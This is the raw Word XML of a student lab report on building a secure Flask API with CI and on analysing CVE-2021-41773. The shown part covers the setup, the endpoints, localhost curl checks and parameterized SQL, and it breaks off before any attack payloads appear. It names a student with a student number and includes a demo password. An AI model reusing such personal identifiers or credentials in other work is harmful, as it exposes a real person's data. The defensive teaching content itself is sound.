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200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Work 1 — Secure REST API Development with CI/CD and Real CVE Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Report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608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b/>
                <w:color w:val="595959"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Laboratory work </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5783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Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>#1 — Secure REST API Development with CI/CD and Real CVE Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608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b/>
                <w:color w:val="595959"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Variant </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5783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Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CVE-2021-41773</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608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b/>
                <w:color w:val="595959"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Student </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5783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Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Xiao Yangshan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608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b/>
                <w:color w:val="595959"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">HDU number </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5783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Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>23320208</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608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b/>
                <w:color w:val="595959"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Repository </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5783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Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&lt;https://github.com/foreverlanterns/secure-demo-api&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608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b/>
                <w:color w:val="595959"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Pipeline </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5783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Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&lt;https://github.com/foreverlanterns/secure-demo-api/actions&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608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b/>
                <w:color w:val="595959"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Last successful run </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5783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Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">40445142669 — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>ecc68db</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, all three jobs green, SARIF in Code scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="D0D0D0"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t>______________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Purpose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Build a backend service that is secure by construction rather than by patching,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>put automated security checks in front of every commit, and then work a real</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>vulnerability end to end — reproduce it in an isolated environment, explain why it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>exists at the code level, fix it, and prove the fix without breaking the service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The three parts are deliberately connected: the API demonstrates the defensive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>side of the same failure modes (injection, broken authentication, unsafe output)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>that the CVE demonstrates on the offensive side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Stack and project initialisation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shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Choice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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Python 3.11+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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 xml:space="preserve">available on the lab machine; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sqlite3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alibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>hmac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alibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>secrets</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the stdlib</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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Flask 3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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minimal surface, explicit request handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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 xml:space="preserve">SQLite via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sqlite3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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zero setup, and parameter binding is explicit in the source (no ORM hiding it)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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bcrypt + PyJWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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standard, auditable primitives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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GitHub Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3099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required by the assignment, free for public repositories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python -m venv .venv &amp;&amp; source .venv/bin/activate</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>pip install -r requirements-dev.txt</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>git init &amp;&amp; git remote add origin git@github.com:&lt;user&gt;/secure-demo-api.git</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>git add . &amp;&amp; git commit -m "feat: secure demo API with CI" &amp;&amp; git push -u origin main</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. API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  <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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</w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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32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 xml:space="preserve">accepts </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, returns a JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Bearer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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user directory, paginated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/posts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Bearer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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creates a post owned by the caller (own design)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/posts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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32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public feed, used to demonstrate escaping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Bearer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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identity decoded from the token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/auth/register</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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32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account creation, password policy enforced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/healthz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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32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liveness probe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Verified behaviour (local run, port 5055):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>$ curl -i http://127.0.0.1:5055/api/data</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>HTTP/1.1 401 UNAUTHORIZED</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>{"error":"authentication required"}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$ curl -X POST http://127.0.0.1:5055/auth/login \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    -H 'Content-Type: application/json' \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    -d '{"login":"alice","password":"Alice-Strong-Pass-1"}'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>{"access_token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...","expires_in":900,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> "token_type":"Bearer","user":{"id":1,"role":"user","username":"alice"}}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$ curl http://127.0.0.1:5055/api/data -H "Authorization: Bearer $TOKEN"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>{"items":[{"created_at":"2026-10-20 12:04:19","id":1,"role":"user","username":"alice"},</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">          {"created_at":"2026-10-20 12:04:20","id":2,"role":"user","username":"bob"}],</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> "page":1,"per_page":20,"total":2}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Security measures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Every query is a prepared statement with bound parameters; no string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">concatenation, f-string or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> formatting touches SQL text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>row = db.execute(</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id, username, password_hash, role FROM users WHERE username = ?",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    (username,),</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>).fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Proof — the three canonical payloads are rejected as literal usernames:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
